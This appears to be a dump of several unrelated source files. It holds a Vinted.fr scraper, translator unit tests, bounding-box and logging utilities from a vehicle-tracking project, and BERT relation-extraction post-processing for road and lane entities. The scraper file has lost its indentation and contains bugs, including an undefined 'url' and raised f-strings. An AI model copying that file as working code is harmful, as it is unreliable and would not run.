url_search_txt = "https://www.vinted.fr/vetements?search_text="
# brands_url = "https://www.vinted.fr/brands"
# catalogs_url = "https://www.vinted.fr/data/search-json.js"
data_repository = "./DATA/"
applicationJSON = r'<script type="application/json" data-js-react-on-rails-store="MainStore">([^<]+)</script>'
id_supported = {
"catalog":{
"regex":applicationJSON,
"nested":"catalogs",
"names":["title","code"],
"mainStore":"catalogs",
"url_name":"catalog[]"
},
"color":{
"regex":applicationJSON,
"names":["title","code"],
"mainStore":"colors",
"url_name":"color_id[]"
},
"brand":{
"names":["title","slug"],
"url_name":"brand_id[]"
},
"size":{
"regex":applicationJSON,
"nested":"sizes",
"names":["title"],
"only_string":True,
"mainStore":"sizeGroups",
"url_name":"size_id[]"
},
"material":{
"regex":applicationJSON,
"nested":"materials",
"names":["title","code"],
"mainStore":"materialGroups",
"url_name":"material_id[]"
},
"status":{
"regex":applicationJSON,
"names":["title"],
"mainStore":"statuses",
"url_name":"status_id[]"
}
# "country":{
# "regex":applicationJSON,
# "names":["title","title_local","iso_code"],
# "mainStore":"countries",
# "url_name":"country_id[]"
# }
}
def JSONfromID(id_names=[x for x in id_supported],id_range=range(0,100),per_page=24,save=False,empty_ids=False):
"""
This function will extract information from Vinted about the ids requested.
Parameters
----------
id_names : LIST or STRING, optional
        This parameter indicates which ids you want to extract from Vinted. The default is every supported id, i.e. the keys of id_supported.
id_range : RANGE, optional
This parameter is used to extract a range of ids for example from 0 to 1000. This parameter is only used to extract brand ids. The default is range(0,100).
per_page : INTEGER, optional
This parameter is the number of item per page in the resulting response the best to extract ids corresponds to 24. The default is 24.
save : BOOLEAN, optional
        This parameter is used to save the ids found to the DATA folder, as follows: ./DATA/*id_name*.json. The default is False.
empty_ids : BOOLEAN, optional
This parameter is used only for the brand id results. Indeed some brands ids point to nothing, if you want those empty ids in your results set this parameter to True. The default is False.
Returns
-------
collected_data : DICTIONARY
        This dictionary will contain every id found. For example, if the id_names parameter was ["color","status"] the dictionary will look like this :
{
"color":[
{
"id": 1,
"title": "Noir",
"hex": "000000",
"order": 1,
"code": "BLACK"
},
{
"id": 3,
"title": "Gris",
"hex": "919191",
"order": 2,
"code": "GREY"
},
.
.
.
],
"status":[
{
"id": 6,
"title": "Neuf avec \u00e9tiquette",
"description": "Article neuf, jamais port\u00e9/utilis\u00e9 avec \u00e9tiquettes ou dans son emballage d\u2019origine.",
"explanation": "Article neuf, jamais port\u00e9/utilis\u00e9 avec \u00e9tiquettes ou dans son emballage d\u2019origine.",
"explanation_title": "Cet article est flambant neuf ?",
"is_default": 0,
"order": 5
},
{
"id": 1,
"title": "Neuf sans \u00e9tiquette",
"description": "Article neuf, jamais port\u00e9/utilis\u00e9, sans \u00e9tiquettes ni emballage d\u2019origine.",
"explanation": "Article neuf, jamais port\u00e9/utilis\u00e9, sans \u00e9tiquettes ni emballage d\u2019origine.",
"explanation_title": "L\u2019article n\u2019a plus d\u2019\u00e9tiquette, mais il n\u2019a jamais \u00e9t\u00e9 port\u00e9 ?",
"is_default": 0,
"order": 10
},
.
.
.
]
}
"""
def brandIds(id_name,id_supported,id_range=id_range,per_page=per_page,empty_ids=empty_ids):
"""
This function will extract a range of brand ids from Vinted and their corresponding information.
Parameters
----------
id_name : STRING
This parameter is not used here but essential.
id_supported : DICTIONARY
This parameter is not used here but essential.
id_range : RANGE, optional
This parameter is used to extract a range of ids for example from 0 to 1000. This parameter is only used to extract brand ids. The default is range(0,100).
per_page : INTEGER, optional
This parameter is the number of item per page in the resulting response the best to extract ids corresponds to 24. The default is 24.
empty_ids : BOOLEAN, optional
This parameter is used only for the brand id results. Indeed some brands ids point to nothing, if you want those empty ids in your results set this parameter to True. The default is False.
Returns
-------
id_DATA : LIST
This list will contains every brand ids found and their corresponding information.
"""
def chunks(lst, n):
"""
This function will create sublists of size n from the list lst.
Parameters
----------
            lst : LIST
                The list to split into chunks.
            n : INTEGER
                The size of each chunk.
Returns
-------
None
"""
for i in range(0, len(lst), n):
yield lst[i:i + n]
chunk_size = 50
id_DATA = []
ids_to_scan = chunks([i for i in id_range],chunk_size)
x = 0
for chunk in ids_to_scan:
x += 1
chunk = [str(s) for s in chunk]
new_url = url_search_txt+"&brand_id[]="+"&brand_id[]=".join(chunk)
req = requests.get(new_url).text
brands = re.findall(r"({\"id\":[0-9]+,\"title\":\"[^\"]+\",\"slug\":[^}]+})", req)
for brand in brands:
brand = json.loads(brand)
if brand not in id_DATA:
id_DATA.append(brand)
print("#######################\n"+id_name.split("_")[0].capitalize()+" ID Extraction...")
print(new_url)
print("Ids processed : "+str(x*chunk_size))
print("IDs found : "+str(len(id_DATA)))
return id_DATA
def params(id_supported,id_names=id_names):
"""
This function will format the id_names as a list.
Parameters
----------
id_names : STRING or LIST, optional
            A list or string that should correspond to one of the supported Vinted IDs. The default is id_names.
id_supported : DICTIONARY
A dictionary containing supported Vinted IDs and their corresponding information
Returns
-------
id_names : LIST
A list of supported Vinted IDs.
"""
def check_supported_ids(id_names=id_names,id_supported=id_supported):
"""
This function will check if all ids in id_name are supported.
Parameters
----------
id_names : list, optional
                A list or string that should correspond to one of the supported Vinted IDs. The default is id_names.
id_supported : TYPE, optional
A dictionary containing supported Vinted IDs and their corresponding information. The default is id_supported.
Returns
-------
BOOLEAN
"""
id_not_supported = []
for i in id_names:
if i not in id_supported:
id_not_supported.append(i)
if len(id_not_supported) != 0:
                raise ValueError(f"Following ids are not supported currently ({id_not_supported}), please check supported ids: {list(id_supported.keys())}")
return True
if isinstance(id_names, str) and id_names in id_supported:
return [id_names]
if isinstance(id_names, list) and check_supported_ids(id_names,id_supported):
return id_names
        str_id_supp = list(id_supported.keys())
        raise ValueError(f'Following id is not supported currently ({id_names}), please check supported ids.\n {str_id_supp}')
def regexMatching(id_name,id_supported):
"""
This function will, from an ID name, extract the corresponding Python object from Vinted with a regex matching.
Parameters
----------
id_name : STRING
A string corresponding to a supported Vinted ID.
id_supported : DICTIONARY
Dictionary which contains Vinted IDs and their corresponding information.
Returns
-------
id_DATA : JSON - PYTHON OBJECT
Python object corresponding to the JSON found in Vinted data corresponding to the id_name.
"""
req = requests.get(url).text
id_DATA = json.loads(re.findall(id_supported[id_name]["regex"], req)[0])
if "mainStore" in id_supported[id_name]:
return id_DATA["catalogFilters"]["dtos"][id_supported[id_name]["mainStore"]]
return id_DATA
def colorModification(id_DATA):
"""
This function will add the # to the hex field of the Python object corresponding to the ID color in Vinted.
Parameters
----------
id_DATA : JSON - PYTHON OBJECT
The python object collected for the color ID.
Returns
-------
id_DATA : JSON - PYTHON OBJECT
The same python object collected for the color ID, but with the # in front of the hex values.
"""
for color in id_DATA:
color["hex"] = "#"+color["hex"]
return id_DATA
id_supported["color"]["modification"] = colorModification
id_supported["brand"]["function"] = brandIds
for i in id_supported:
if "regex" in id_supported[i]:
id_supported[i]["function"] = regexMatching
id_names = params(id_supported)
collected_data = {}
for id_name in id_names:
id_DATA = id_supported[id_name]["function"](id_name,id_supported)
if "modification" in id_supported[id_name]:
id_DATA = id_supported[id_name]["modification"](id_DATA)
collected_data[id_name]=id_DATA
print(id_name.capitalize()+" found : "+str(len(id_DATA)))
if save:
for id_collected in collected_data:
with open("./DATA/"+id_collected+".json",'w') as outfile:
json.dump(collected_data[id_collected],outfile,indent=2)
return collected_data
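# Minimal usage sketch for JSONfromID (illustrative only; the id names are keys of
# id_supported and save=True writes the results to ./DATA/<id_name>.json):
#   collected = JSONfromID(id_names=["color", "status"], save=True)
#   print(len(collected["color"]), "colors found")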
def searchVinted(print_url=True,searchText="",catalog=[],color=[],brand=[],size=[],material=[],status=[],country=[],price_to=1000000,price_from=0,currency="EUR",per_page=120,page=1):
"""
    This function provides a programmatic way to search for items within Vinted, using the Vinted data that is extracted regularly and stored in the DATA folder.
Parameters
----------
searchText : STRING, optional
A string that will correspond to a search with the Vinted search bar.
catalog : LIST, optional
A list of specific IDs or catalog names.
color : LIST, optional
A list of specific IDs or color names.
brand : LIST, optional
A list of specific IDs or brand names.
size : LIST, optional
A list of specific IDs or size names.
material : LIST, optional
A list of specific IDs or material names.
status : LIST, optional
A list of specific IDs or status names.
country : LIST, optional
A list of specific IDs or country names.
price_to : INTEGER, optional
A maximum price fix as the max limit.
price_from : INTEGER, optional
A minimum price fix as the min limit.
currency : STRING, optional
The currency in which you want the prices.
per_page : INTEGER, optional
The number of items per page in your result.
page : INTEGER, optional
The page index.
Return
------
--- : DICTIONARY
This function will return a dictionary looking like :
{
"items": [item1,item2,item3,item4,...,itemN],
"searchParams":{Parameters of the search within Vinted}
}
"""
def matchingIDs(ID_name,IDs):
"""
This function will try to match the information provided as ID to the data corresponding to the ID_name.
For example if we provide the ID_name 'color', we can either provide an integer ID or a string such as 'pink' for the corresponding color.
Parameters
----------
ID_name : STRING
An ID name corresponding to one of the supported id within id_supported.
IDs : LIST
A list of integer or string corresponding to IDs found within Vinted data.
Return
------
IDs_requested : LIST
A list of matched IDs corresponding to information provided in IDs.
"""
def findID(ID_name,ID,data):
"""
This function will try to match an ID to the 'ID' provided, it can either be an integer or a string corresponding to a term inside the title of ID for example 'rose' for the color pink.
Parameters
----------
ID_name : STRING
A string that correspond to one if the ID name supported (Check the dictionary id_supported).
ID : STRING OR INTEGER
If ID is an integer it will be consider as the ID to look for (except for sizes as these can sometimes be integer), if it is a string then the algorithm will try to match an ID based on the string provided.
data : LIST
A list of dictionaries corresponding to one of the JSON file in the DATA folder.
Return
------
--- : LIST
A list of IDs matched to the string or integer provided as ID.
"""
def matchNames(ID_name,ID,data):
"""
This function will return the corresponding ids matched to the ID provided with the parameter data and ID_name. IDs will be matched through a string matching.
Parameters
----------
ID_name : STRING
The name of the ID to check for example if you are looking for 'H&M' brand the ID_name should be 'brand'.
ID : STRING
The string provided to find within the data for example for an ID_name='brand' the ID can be 'Nike'.
data : LIST
A list of dictionaries corresponding to one of the JSON file in the DATA folder.
Return
------
matched_ids : LIST
A list of integer corresponding to the IDs matched.
"""
matched_ids = []
for data_id in data:
if ID.lower() in [data_id[n].lower() for n in id_supported[ID_name]["names"] if n in data_id]:
matched_ids.append(data_id["id"])
return matched_ids
def isInt(s):
"""
This function will check if the s object is an integer or not and return the corresponding boolean.
Parameters
----------
s : PYTHON OBJECT
The Python object that need to be checked.
Return
------
A BOOLEAN
"""
try:
int(s)
return True
except ValueError:
return False
if "only_string" in id_supported[ID_name] and id_supported[ID_name]["only_string"]:
return matchNames(ID_name,ID,data)
if isInt(ID):
return [int(ID)]
return matchNames(ID_name,ID,data)
def treeWalk(ID_name,ID,tree):
"""
Recursive function that will walk through all parents and child of the tree provided as parameter to find the corresponding IDs.
Parameters
----------
ID_name : STRING
The name of the ID to check for example if you are looking for 'H&M' brand the ID_name should be 'brand'.
ID : STRING
The string provided to find within the data for example for an ID_name='brand' the ID can be 'Nike'.
tree : LIST
A list of dictionaries corresponding to one of the JSON file in the DATA folder, ordered as a tree with parents and childs IDs.
Return
------
found_IDs : LIST
A list of integer corresponding to the IDs matched.
"""
found_IDs = findID(ID_name,ID,tree)
# Recursive loop
for item in tree:
if id_supported[ID_name]["nested"] in item and len(item[id_supported[ID_name]["nested"]])>0:
found_IDs += treeWalk(ID_name,ID,item[id_supported[ID_name]["nested"]])
return found_IDs
IDs_requested = []
# Checking parameters
if ID_name not in id_supported:
raise f"{str(ID_name)} not supported please check the following supported IDs {' / '.join(id_supported)}"
if not isinstance(IDs,list):
if isinstance(IDs,str):
IDs = [IDs]
else:
raise f"{str(IDs)} must be a string or a list."
# Loading corresponding data
with open(file=data_repository+ID_name+".json",mode="r") as f:
data = json.loads(f.read())
# Loop through provided information
for ID in IDs:
if "nested" in id_supported[ID_name]:
IDs_requested += treeWalk(ID_name,ID,data)
tmp = []
for i in IDs_requested:
if i not in tmp:
tmp.append(i)
IDs_requested = tmp
else:
IDs_requested += findID(ID_name,ID,data)
return IDs_requested
params = {
"catalog":catalog,
"color":color,
"brand":brand,
"size":size,
"material":material,
"status":status,
"country":country
}
url_search = "https://www.vinted.fr/vetements?search_text="+searchText
url_params = {
"per_page":per_page,
"page":page,
"price_from":price_from,
"price_to":price_to,
"currency":currency
}
for param in params:
if len(params[param]) != 0:
url_params[id_supported[param]["url_name"]]=matchingIDs(param,params[param])
req = requests.get(url_search,params=url_params)
if print_url:
print(req.url)
items = json.loads(re.findall(r'<script type="application/json" data-js-react-on-rails-store="MainStore">([^<]+)</script>',req.text)[0])["items"]
return {"items":items["byId"],"searchParams":items["catalogItems"]}
def getField(items,field_names=["id"]):
"""
This function will extract, from the result of Vinted search through searchVinted function, all values of a specific field. For example in each Item there is a field called 'price', with this function you can get a list of all prices from your search.
Parameters
----------
items : LIST
An item list that corresponds to a list of dictionaries which can be found as the item "items" of the searchVinted response.
field_names : LIST, optional
        A list of field names provided as strings. For example: "price", "id", "photo", etc.
Returns
-------
VALUES : DICTIONARY
The dictionary will corresponds to the name of the field as the key and the list of values as value.
"""
VALUES = {}
for field_name in field_names:
VALUES[field_name] = []
for item in items:
if field_name not in items[item]:
raise f"The field name {field_name} does not exists within the following item :\n {items[item]}"
VALUES[field_name].append(items[item][field_name])
return VALUES
def getData(ID_name):
with open(file=data_repository+ID_name+".json",mode="r") as f:
return json.loads(f.read())
if __name__ == '__main__':
JSONfromID()
``` |
{
"source": "0AlphaZero0/xzceb-flask_eng_fr",
"score": 3
} |
#### File: machinetranslation/tests/tests.py
```python
import unittest
from translator import english_to_french, french_to_english
class TestTranslateEnToFr(unittest.TestCase):
"""
Class to test the function english_to_french
"""
def test1(self):
"""
Function to test the function english_to_french
"""
self.assertIsNone(english_to_french(None))
self.assertEqual(english_to_french("Hello"), "Bonjour")
self.assertNotEqual(english_to_french("Bonjour"), "Hello")
class TestTranslateFrToEn(unittest.TestCase):
"""
Class to test the function french_to_english
"""
def test1(self):
"""
Function to test the function french_to_english
"""
self.assertIsNone(french_to_english(None))
self.assertEqual(french_to_english("Bonjour"), "Hello")
self.assertNotEqual(french_to_english("Hello"), "Bonjour")
unittest.main()
``` |
{
"source": "0AnonymousSite0/Data-and-Codes-for-Integrating-Computer-Vision-and-Traffic-Modelling",
"score": 3
} |
#### File: Detecting and tracking vehicle (CPU version)/blobs/utils.py
```python
def get_centroid(bounding_box):
(x, y, w, h) = bounding_box
return (round((x + x + w) / 2), round((y + y + h) / 2))
def box_contains_point(bbox, pt):
return bbox[0] < pt[0] < bbox[0] + bbox[2] and bbox[1] < pt[1] < bbox[1] + bbox[3]
def get_area(bbox):
_, _, w, h = bbox
return w * h
def get_iou(bbox1, bbox2):
# calculate the Intersection over Union (IoU) of two bounding boxes
bbox1_x1 = bbox1[0]
bbox1_y1 = bbox1[1]
bbox1_x2 = bbox1[0] + bbox1[2]
bbox1_y2 = bbox1[1] + bbox1[3]
bbox2_x1 = bbox2[0]
bbox2_y1 = bbox2[1]
bbox2_x2 = bbox2[0] + bbox2[2]
bbox2_y2 = bbox2[1] + bbox2[3]
overlap_x1 = max(bbox1_x1, bbox2_x1)
overlap_y1 = max(bbox1_y1, bbox2_y1)
overlap_x2 = min(bbox1_x2, bbox2_x2)
overlap_y2 = min(bbox1_y2, bbox2_y2)
overlap_width = overlap_x2 - overlap_x1
overlap_height = overlap_y2 - overlap_y1
if overlap_width < 0 or overlap_height < 0:
return 0.0
overlap_area = overlap_width * overlap_height
bbox1_area = (bbox1_x2 - bbox1_x1) * (bbox1_y2 - bbox1_y1)
bbox2_area = (bbox2_x2 - bbox2_x1) * (bbox2_y2 - bbox2_y1)
combined_area = bbox1_area + bbox2_area - overlap_area
epsilon = 1e-5 # small value to prevent division by zero
iou = overlap_area / (combined_area + epsilon)
return iou
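# Worked example (not part of the original module): two 10x10 boxes offset by 5 pixels in
# both directions overlap in a 5x5 region, so
#   get_iou((0, 0, 10, 10), (5, 5, 10, 10)) ~= 25 / (100 + 100 - 25) ~= 0.143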
def get_inside(bbox1, bbox2):
    # check whether one bounding box is fully contained within the other
bbox1_x1 = bbox1[0]
bbox1_y1 = bbox1[1]
bbox1_x2 = bbox1[0] + bbox1[2]
bbox1_y2 = bbox1[1] + bbox1[3]
bbox2_x1 = bbox2[0]
bbox2_y1 = bbox2[1]
bbox2_x2 = bbox2[0] + bbox2[2]
bbox2_y2 = bbox2[1] + bbox2[3]
inside=0
if bbox1_x1<bbox2_x1 and bbox1_y1<bbox2_y1 and bbox1_x2>bbox2_x2 and bbox1_y2>bbox2_y2:
inside=1
elif bbox1_x1 > bbox2_x1 and bbox1_y1 > bbox2_y1 and bbox1_x2 < bbox2_x2 and bbox1_y2 < bbox2_y2:
inside = 2
else:
inside=0
return inside
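# Illustrative return values for get_inside (not part of the original module):
#   1 -> bbox2 lies strictly inside bbox1, e.g. get_inside((0, 0, 10, 10), (2, 2, 3, 3)) == 1
#   2 -> bbox1 lies strictly inside bbox2
#   0 -> neither box fully contains the other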
```
#### File: Detecting and tracking vehicle (GPU version)/util/logger.py
```python
import cv2
import os
import sys
import pathlib
import json
import uuid
from datetime import datetime
def send_to_stdout(level, message, data):
events_to_not_log = ['TRACKER_UPDATE']
#if data['event'] not in events_to_not_log:
#print('[{0}]'.format(datetime.now()), level + ':', message, json.dumps(data))
def send_to_log_file():
pass
def send_to_redis_pubsub():
pass
def log_error(message, data):
send_to_stdout('ERROR', message, data)
sys.exit(0)
def log_info(message, data):
send_to_stdout('INFO', message, data)
def log_debug(message, data):
send_to_stdout('DEBUG', message, data)
def take_screenshot(frame):
screenshots_directory = 'data/screenshots'
pathlib.Path(screenshots_directory).mkdir(parents=True, exist_ok=True)
screenshot_path = os.path.join(screenshots_directory, 'img_' + uuid.uuid4().hex + '.jpg')
cv2.imwrite(screenshot_path, frame, [cv2.IMWRITE_JPEG_QUALITY, 80])
log_info('Screenshot captured.', {
'event': 'SCREENSHOT_CAPTURE',
'path': screenshot_path,
})
``` |
{
"source": "0AnonymousSite0/Social-media-data-to-Interrelated-informtion-to-Parameters-of-virtual-road-model",
"score": 2
} |
#### File: Codes of the SMD2II model/Codes of Transfer-learning of Bert (stage I classification)/produce_submit_json_file.py
```python
import os
import json
# Get the directory that holds the latest model prediction data
def get_latest_model_predict_data_dir(new_epochs_ckpt_dir=None):
    # Get the path of the newest file under a directory
def new_report(test_report):
        lists = os.listdir(test_report)  # list all files and folders in the directory
        lists.sort(key=lambda fn: os.path.getmtime(test_report + "/" + fn))  # sort by modification time
        file_new = os.path.join(test_report, lists[-1])  # keep the newest file
return file_new
if new_epochs_ckpt_dir is None:
        # Get the output directory of the classification predictions
input_new_epochs = os.path.join(
os.path.abspath(os.path.join(os.path.dirname(__file__), "output")), "sequnce_infer_out")
        # Get the latest epoch directory
new_ckpt_dir = new_report(input_new_epochs)
input_new_epochs_ckpt = os.path.join(input_new_epochs, new_ckpt_dir)
        # Get the latest checkpoint directory under the latest epoch
new_epochs_ckpt_dir = new_report(input_new_epochs_ckpt)
    if not os.path.exists(new_epochs_ckpt_dir):
        raise ValueError("Path does not exist! {}".format(new_epochs_ckpt_dir))
return new_epochs_ckpt_dir
# this dict comes from the raw_data file all_50_schemas
schemas_dict_relation_2_object_subject_type = {
'Road_status':[('Status','Road')],
'Lane_status':[('Status','Lane')],
'Road_position':[('Position_of_road','Road')],
# 'At':[('Road','Road')],
# 'PRIOR':[('Road','Road')],
# 'PAST':[('Road','Road')],
# 'Bet':[('Road','Road')],
'Lane_of_Road':[('Road','Lane')],
'Lane_direction':[('Direction_of_lane','Lane')],
'Lane_position':[('Position_of_lane','Lane')],
'Road_direction':[('Direction_of_road','Road')],
#'Lane_number':[('Number','Lane')]
# '父亲': [('人物', '人物')],
# '妻子': [('人物', '人物')],
# '母亲': [('人物', '人物')],
# '丈夫': [('人物', '人物')],
# '祖籍': [('地点', '人物')],
# '总部地点': [('地点', '企业')],
# '出生地': [('地点', '人物')],
# '目': [('目', '生物')],
# '面积': [('Number', '行政区')],
# '简称': [('Text', '机构')],
# '上映时间': [('Date', '影视作品')],
# '所属专辑': [('音乐专辑', '歌曲')],
# '注册资本': [('Number', '企业')],
# '首都': [('城市', '国家')],
# '导演': [('人物', '影视作品')],
# '字': [('Text', '历史人物')],
# '身高': [('Number', '人物')],
# '出品公司': [('企业', '影视作品')],
# '修业年限': [('Number', '学科专业')],
# '出生日期': [('Date', '人物')],
# '制片人': [('人物', '影视作品')],
# '编剧': [('人物', '影视作品')],
# '国籍': [('国家', '人物')],
# '海拔': [('Number', '地点')],
# '连载网站': [('网站', '网络小说')],
# '朝代': [('Text', '历史人物')],
# '民族': [('Text', '人物')],
# '号': [('Text', '历史人物')],
# '出版社': [('出版社', '书籍')],
# '主持人': [('人物', '电视综艺')],
# '专业代码': [('Text', '学科专业')],
# '歌手': [('人物', '歌曲')],
# '作词': [('人物', '歌曲')],
# '主角': [('人物', '网络小说')],
# '董事长': [('人物', '企业')],
# '成立日期': [('Date', '机构'), ('Date', '企业')],
# '毕业院校': [('学校', '人物')],
# '占地面积': [('Number', '机构')],
# '官方语言': [('语言', '国家')],
# '邮政编码': [('Text', '行政区')],
# '人口数量': [('Number', '行政区')],
# '所在城市': [('城市', '景点')],
# '作者': [('人物', '图书作品')],
# '作曲': [('人物', '歌曲')],
# '气候': [('气候', '行政区')],
# '嘉宾': [('人物', '电视综艺')],
# '主演': [('人物', '影视作品')],
# '改编自': [('作品', '影视作品')],
# '创始人': [('人物', '企业')]
}
class File_Management(object):
"""读取TXT文件,以列表形式返回文件内容"""
def __init__(self, TEST_DATA_DIR=None, MODEL_OUTPUT_DIR=None, Competition_Mode=True):
self.TEST_DATA_DIR = TEST_DATA_DIR
self.MODEL_OUTPUT_DIR = get_latest_model_predict_data_dir(MODEL_OUTPUT_DIR)
self.Competition_Mode = Competition_Mode
def file_path_and_name(self):
text_sentence_file_path = os.path.join(self.TEST_DATA_DIR, "text_and_one_predicate.txt")
token_in_file_path = os.path.join(self.TEST_DATA_DIR, "token_in_not_UNK_and_one_predicate.txt")
predicate_token_label_file_path = os.path.join(self.MODEL_OUTPUT_DIR, "token_label_predictions.txt")
file_path_list = [text_sentence_file_path, token_in_file_path, predicate_token_label_file_path]
file_name_list = ["text_sentence_list", "token_in_not_NUK_list ", "token_label_list",]
if not self.Competition_Mode:
spo_out_file_path = os.path.join(self.TEST_DATA_DIR, "spo_out.txt")
if os.path.exists(spo_out_file_path):
file_path_list.append(spo_out_file_path)
file_name_list.append("reference_spo_list")
return file_path_list, file_name_list
def read_file_return_content_list(self):
file_path_list, file_name_list = self.file_path_and_name()
content_list_summary = []
for file_path in file_path_list:
with open(file_path, "r", encoding='utf-8') as f:
content_list = f.readlines()
content_list = [content.replace("\n", "") for content in content_list]
content_list_summary.append(content_list)
if self.Competition_Mode:
content_list_length_summary = [(file_name, len(content_list)) for content_list, file_name in
zip(content_list_summary, file_name_list)]
file_line_number = self._check_file_line_numbers(content_list_length_summary)
print("Competition_Mode=True, check file line pass!")
print("输入文件行数一致,行数是: ", file_line_number)
else:
file_line_number = len(content_list_summary[0])
print("first file line number: ", file_line_number)
print("do not check file line! if you need check file line, set Competition_Mode=True")
print("\n")
return content_list_summary, file_line_number
def _check_file_line_numbers(self, content_list_length_summary):
content_list_length_file_one = content_list_length_summary[0][1]
for file_name, file_line_number in content_list_length_summary:
assert file_line_number == content_list_length_file_one
return content_list_length_file_one
class Sorted_relation_and_entity_list_Management(File_Management):
"""
    Generate a list of candidate relations sorted by probability and a list of entities sorted by their order in the original sentence
"""
def __init__(self, TEST_DATA_DIR, MODEL_OUTPUT_DIR, Competition_Mode=False):
File_Management.__init__(self, TEST_DATA_DIR=TEST_DATA_DIR, MODEL_OUTPUT_DIR=MODEL_OUTPUT_DIR, Competition_Mode=Competition_Mode)
        # Relation list: map the model's real-valued outputs to labels
#self.relationship_label_list = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期', '创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站', '邮政编码', '面积', '首都']
self.relationship_label_list = ['Road_status','Lane_status','At','PRIOR', 'PAST', 'Bet', 'LaneOfRoad','Lane_direction','Lane_position','Road_direction','Lane_number']
self.Competition_Mode = Competition_Mode
print("test数据输入路径是:\t{}".format(self.TEST_DATA_DIR))
print("最新模型预测结果路径是:\t{}".format(self.MODEL_OUTPUT_DIR))
def get_input_list(self,):
content_list_summary, self.file_line_number = self.read_file_return_content_list()
if len(content_list_summary) == 4:
[text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list] = content_list_summary
elif len(content_list_summary) == 3:
[text_sentence_list, token_in_not_NUK_list, token_label_list] = content_list_summary
reference_spo_list = [None] * len(text_sentence_list)
else:
raise ValueError("check code!")
print(reference_spo_list)
return text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list
    # Merge WordPiece sub-tokens and single characters back into whole words
def _merge_WordPiece_and_single_word(self, entity_sort_list):
# [..['B-SUB', '新', '地', '球', 'ge', '##nes', '##is'] ..]---> [..('SUB', '新地球genesis')..]
entity_sort_tuple_list = []
for a_entity_list in entity_sort_list:
entity_content = ""
entity_type = None
for idx, entity_part in enumerate(a_entity_list):
if idx == 0:
entity_type = entity_part
if entity_type[:2] not in ["B-", "I-"]:
break
else:
if entity_part.startswith("##"):
entity_content += entity_part.replace("##", "")
else:
entity_content += entity_part
if entity_content != "":
entity_sort_tuple_list.append((entity_type[2:], entity_content))
return entity_sort_tuple_list
    # Convert the [SPO_SEP]-separated format of spo_out.txt into a standard list of dicts
    # e.g. 妻子 人物 人物 杨淑慧 周佛海[SPO_SEP]丈夫 人物 人物 周佛海 杨淑慧 ---> dict
def preprocessing_reference_spo_list(self, refer_spo_str):
refer_spo_list = refer_spo_str.split("[SPO_SEP]")
refer_spo_list = [spo.split(" ") for spo in refer_spo_list]
refer_spo_list = [dict([('predicate', spo[0]),
('object_type', spo[2]), ('subject_type', spo[1]),
('object', spo[4]), ('subject', spo[3])]) for spo in refer_spo_list]
print(refer_spo_list)
refer_spo_list.sort(key= lambda item:item['predicate'])
return refer_spo_list
    # Output the model's entity labels in their relative positions in the original sentence
def model_token_label_2_entity_sort_tuple_list(self, token_in_not_UNK_list, predicate_token_label_list):
"""
:param token_in_not_UNK: ['紫', '菊', '花', '草', '是', '菊', '目', ',', '菊', '科', ',', '松', '果', '菊', '属', '的', '植', '物']
:param predicate_token_label: ['B-SUB', 'I-SUB', 'I-SUB', 'I-SUB', 'O', 'B-OBJ', 'I-OBJ', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O', 'O']
:return: [('SUB', '紫菊花草'), ('OBJ', '菊目')]
"""
        # Remove special symbols from the model output
def preprocessing_model_token_lable(predicate_token_label_list, token_in_list_lenth):
            # TODO: check for errors and correct them
if predicate_token_label_list[0] == "[CLS]":
predicate_token_label_list = predicate_token_label_list[1:] # y_predict.remove('[CLS]')
            if len(predicate_token_label_list) > token_in_list_lenth:  # only keep up to the input sequence length
predicate_token_label_list = predicate_token_label_list[:token_in_list_lenth]
return predicate_token_label_list
        # Preprocess the predicted label list
predicate_token_label_list = preprocessing_model_token_lable(predicate_token_label_list, len(token_in_not_UNK_list))
entity_sort_list = []
entity_part_list = []
        # TODO: the branching logic below should be double-checked; it may not cover all cases
for idx, token_label in enumerate(predicate_token_label_list):
            # If the label is "O"
if token_label == "O":
                # if entity_part_list is not empty, commit it directly
if len(entity_part_list) > 0:
entity_sort_list.append(entity_part_list)
entity_part_list = []
# 如果标签以字符 "B-" 开始
if token_label.startswith("B-"):
                # if entity_part_list is not empty, commit the previous entity_part_list first
if len(entity_part_list) > 0:
entity_sort_list.append(entity_part_list)
entity_part_list = []
entity_part_list.append(token_label)
entity_part_list.append(token_in_not_UNK_list[idx])
                # if this is the last label in the sequence
if idx == len(predicate_token_label_list) - 1:
entity_sort_list.append(entity_part_list)
# 如果标签以字符 "I-" 开始 或者等于 "[##WordPiece]"
if token_label.startswith("I-") or token_label == "[##WordPiece]":
                # if entity_part_list is not empty, merge the corresponding token into entity_part_list
if len(entity_part_list) > 0:
                    entity_part_list.append(' ')  # needed for English, not for Chinese
entity_part_list.append(token_in_not_UNK_list[idx])
                # if this is the last label in the sequence
if idx == len(predicate_token_label_list) - 1:
entity_sort_list.append(entity_part_list)
            # The [SEP] separator marks the end of the labeled segment to process
if token_label == "[SEP]":
break
entity_sort_tuple_list = self._merge_WordPiece_and_single_word(entity_sort_list)
print(entity_sort_tuple_list)
return entity_sort_tuple_list
    # Generate the sorted relation list and entity list
def produce_relationship_and_entity_sort_list(self):
text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list = self.get_input_list()
for [text_sentence, token_in_not_UNK, token_label, refer_spo_str] in\
zip(text_sentence_list, token_in_not_NUK_list, token_label_list, reference_spo_list):
text = text_sentence.split("\t")[0]
text_predicate = text_sentence.split("\t")[1]
token_in = token_in_not_UNK.split("\t")[0].split(" ")
token_in_predicate = token_in_not_UNK.split("\t")[1]
assert text_predicate == token_in_predicate
token_label_out = token_label.split(" ")
entity_sort_tuple_list = self.model_token_label_2_entity_sort_tuple_list(token_in, token_label_out)
if self.Competition_Mode:
yield text, text_predicate, entity_sort_tuple_list, None
else:
if refer_spo_str is not None:
refer_spo_list = self.preprocessing_reference_spo_list(refer_spo_str)
else:
refer_spo_list = []
yield text, text_predicate, entity_sort_tuple_list, refer_spo_list
    # Print the sorted relation list and entity list
def show_produce_relationship_and_entity_sort_list(self):
idx = 0
